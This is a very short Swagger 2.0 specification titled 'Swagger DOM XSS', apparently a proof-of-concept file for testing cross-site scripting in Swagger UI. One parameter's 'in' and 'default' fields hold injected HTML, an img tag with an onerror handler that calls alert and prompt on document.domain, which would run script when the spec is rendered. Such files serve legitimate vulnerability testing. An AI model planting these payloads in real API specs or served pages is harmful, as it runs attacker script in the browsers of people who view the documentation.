swagger: '2.0'
info: 
  title: Swagger DOM XSS
  description: TestXSS
  version: production
basePath: /
security:
  - basicAuth: []
paths:
  '/xss.html':
    get:
      parameters:
        - description: XSS
          type: string
          in: \"><img src=x onerror=alert(document.domain)>
          default: \"><img src=x onerror=prompt(document.domain)>
      responses:
        '200':
          description: No response was specified
